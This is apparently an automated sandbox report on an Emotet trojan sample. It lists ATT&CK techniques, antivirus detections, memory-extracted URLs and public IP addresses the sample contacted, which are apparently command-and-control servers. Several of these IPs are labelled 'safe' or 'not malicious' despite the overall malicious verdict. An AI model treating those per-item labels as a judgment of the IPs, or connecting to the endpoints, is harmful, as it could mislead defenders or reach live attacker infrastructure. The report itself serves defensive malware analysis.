                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    sample.exe.exe78%VirustotalBrowse
                    sample.exe.exe97%ReversingLabsWin32.Trojan.Emotet
                    sample.exe.exe100%AviraTR/Crypt.XPACK.Gen
                    sample.exe.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    4.0.videowlan.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.sample.exe.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.0.sample.exe.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    4.2.videowlan.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    3.0.videowlan.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.sample.exe.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.0.sample.exe.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    3.2.videowlan.exe.c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://schemas.mi0%URL Reputationsafe
                    http://schemas.mi0%URL Reputationsafe
                    http://schemas.mi0%URL Reputationsafe
                    http://schemas.mi0%URL Reputationsafe
                    http://docs.oasis-open.o00%Avira URL Cloudsafe
                    https://79.172.249.82:443/3%VirustotalBrowse
                    https://79.172.249.82:443/0%Avira URL Cloudsafe
                    https://login.live.ppsecure0%Avira URL Cloudsafe
                    http://Passport.NET/tbpose0%Avira URL Cloudsafe
                    https://178.62.39.238:443/0%Avira URL Cloudsafe
                    http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
                    http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
                    http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
                    http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsdp.as0%Avira URL Cloudsafe
                    http://passport.net/tb0%Avira URL Cloudsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    http://167.114.153.153/0%Avira URL Cloudsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://79.172.249.82:443/false
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://178.62.39.238:443/false
                    • Avira URL Cloud: safe
                    unknown
                    http://167.114.153.153/false
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.misvchost.exe, 00000023.00000003.811444618.000001E91F757000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.818192640.000001E91F72E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/02/scicysvchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                      high
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpfalse
                            high
                            https://corp.roblox.com/contact/svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000E.00000003.309234233.000002C4B464F000.00000004.00000001.sdmpfalse
                                high
                                http://docs.oasis-open.o0svchost.exe, 00000023.00000003.1128521121.000001E91F752000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/02/scrsvchost.exe, 00000023.00000002.1281474062.000001E91F764000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                    high
                                    https://login.live.ppsecuresvchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpfalse
                                        high
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd/Encrsvchost.exe, 00000023.00000002.1281395121.000001E91F713000.00000004.00000001.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmpfalse
                                            high
                                            https://www.hulu.com/ca-privacy-rightssvchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpfalse
                                              high
                                              http://Passport.NET/tbposesvchost.exe, 00000023.00000002.1283907175.000001E91FC13000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                                high
                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000003.309587482.000002C4B4649000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.w3.svchost.exe, 00000023.00000002.1281425866.000001E91F732000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.hulu.com/termssvchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdPsvchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue(svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://en.help.roblox.com/hc/en-ussvchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1284162340.000001E91FC3E000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.bingmapsportal.comsvchost.exe, 0000000E.00000002.310250602.000002C4B4613000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://signup.live.com/signup.aspxsvchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=806018204055Z0#1svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/scs-cbcsvchost.exe, 00000023.00000002.1281474062.000001E91F764000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://www.hulu.com/do-not-sell-my-infosvchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://wellformedweb.org/CommentAPI/svchost.exe, 00000025.00000002.958877289.00000237FDA60000.00000002.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsdp.assvchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&amp;id=80502svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://www.roblox.com/developsvchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://account.live.com/msangcwamsvchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://instagram.com/hiddencity_svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdddsvchost.exe, 00000023.00000003.811531536.000001E91F72F000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumeratesvchost.exe, 00000007.00000003.597153512.000001CC7ECA4000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.310290532.000002C4B464B000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://passport.net/tbsvchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1128871295.000001E91FC43000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://corp.roblox.com/parents/svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569716300.000001AB9EF74000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.310250602.000002C4B4613000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://%s.xboxlive.comsvchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    low
                                                                                                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000E.00000003.309234233.000002C4B464F000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000023.00000003.817330267.000001E91F732000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.hulu.com/privacysvchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000E.00000002.310290532.000002C4B464B000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.811539482.000001E91F762000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scsis-200svchost.exe, 00000023.00000003.1128521121.000001E91F752000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://dynamic.tsvchost.exe, 0000000E.00000003.309313094.000002C4B4663000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.309587482.000002C4B4649000.00000004.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/sc1A=svchost.exe, 00000023.00000003.811539482.000001E91F762000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000E.00000003.310059566.000002C4B4638000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.roblox.com/info/privacysvchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.g5e.com/termsofservicesvchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000E.00000002.310290532.000002C4B464B000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://activity.windows.comsvchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000023.00000003.1128451283.000001E91F788000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.811531536.000001E91F72F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://%s.dnet.xboxlive.comsvchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        low
                                                                                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000E.00000003.309587482.000002C4B4649000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          high

                                                                                                                                                                                          Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          178.62.39.238
                                                                                                                                                                                          unknownEuropean Union
                                                                                                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                          80.86.91.232
                                                                                                                                                                                          unknownGermany
                                                                                                                                                                                          8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                                                          173.230.145.224
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                                                          167.114.153.153
                                                                                                                                                                                          unknownCanada
                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                          37.187.4.178
                                                                                                                                                                                          unknownFrance
                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                          79.172.249.82
                                                                                                                                                                                          unknownHungary
                                                                                                                                                                                          43711SZERVERNET-HU-ASHUfalse
                                                                                                                                                                                          193.169.54.12
                                                                                                                                                                                          unknownGermany
                                                                                                                                                                                          49464ICFSYSTEMSDEfalse
                                                                                                                                                                                          71.244.60.231
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          5650FRONTIER-FRTRUSfalse
                                                                                                                                                                                          159.203.94.198
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                          80.82.115.164
                                                                                                                                                                                          unknownUnited Kingdom
                                                                                                                                                                                          41357UK-34SP-ASGBfalse
                                                                                                                                                                                          186.103.199.252
                                                                                                                                                                                          unknownChile
                                                                                                                                                                                          15311TelefonicaEmpresasCLfalse

                                                                                                                                                                                          Private

                                                                                                                                                                                          IP
                                                                                                                                                                                          192.168.2.1
                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                                          Analysis ID:379239
                                                                                                                                                                                          Start date:31.03.2021
                                                                                                                                                                                          Start time:17:55:06
                                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 14m 29s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:light
                                                                                                                                                                                          Sample file name:sample.exe.exe
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                          Number of analysed new started processes analysed:40
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • HDC enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal92.troj.evad.winEXE@23/11@0/13
                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          HDC Information:
                                                                                                                                                                                          • Successful, ratio: 42.1% (good quality ratio 38.4%)
                                                                                                                                                                                          • Quality average: 79%
                                                                                                                                                                                          • Quality standard deviation: 30.6%
                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Adjust boot time
                                                                                                                                                                                          • Enable AMSI
                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                          Warnings:
                                                                                                                                                                                          Show All
                                                                                                                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 104.43.193.48, 20.82.209.183, 184.30.24.56, 92.122.213.194, 92.122.213.247, 93.184.221.240, 20.54.26.129, 20.82.209.104, 52.155.217.156, 20.190.160.8, 20.190.160.129, 20.190.160.69, 20.190.160.4, 20.190.160.73, 20.190.160.132, 20.190.160.71, 20.190.160.136, 51.104.136.2, 40.127.240.158, 40.126.31.143, 40.126.31.4, 20.190.159.136, 40.126.31.8, 20.190.159.132, 40.126.31.1, 20.190.159.134, 40.126.31.141, 93.184.220.29, 20.50.102.62
